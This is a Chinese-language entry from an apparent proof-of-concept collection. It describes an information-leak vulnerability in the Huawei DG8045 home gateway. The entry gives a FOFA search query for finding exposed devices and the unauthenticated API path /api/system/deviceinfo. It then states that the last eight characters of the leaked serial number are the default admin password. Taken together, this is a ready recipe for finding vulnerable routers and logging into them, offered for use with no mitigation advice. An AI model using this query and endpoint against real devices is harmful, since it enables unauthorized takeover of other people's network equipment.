Awesome-POC/网络设备漏洞/Huawei DG8045 deviceinfo 信息泄漏漏洞.md

33 lines
614 B
Markdown
Raw Normal View History

2022-05-19 18:49:40 +08:00
# Huawei DG8045 deviceinfo 信息泄漏漏洞
## 漏洞描述
Huawei DG8045 deviceinfo api接口存在信息泄漏漏洞攻击者通过泄漏的信息可以获得账号密码登录后台
## 漏洞影响
```
Huawei DG8045
```
## FOFA
```
app="DG8045-Home-Gateway-DG8045"
```
## 漏洞复现
登录页面
![image-20220519181753641](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191817718.png)
验证POC
```
/api/system/deviceinfo
```
![image-20220519181803482](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191818539.png)
SerialNumber 后8位即为初始密码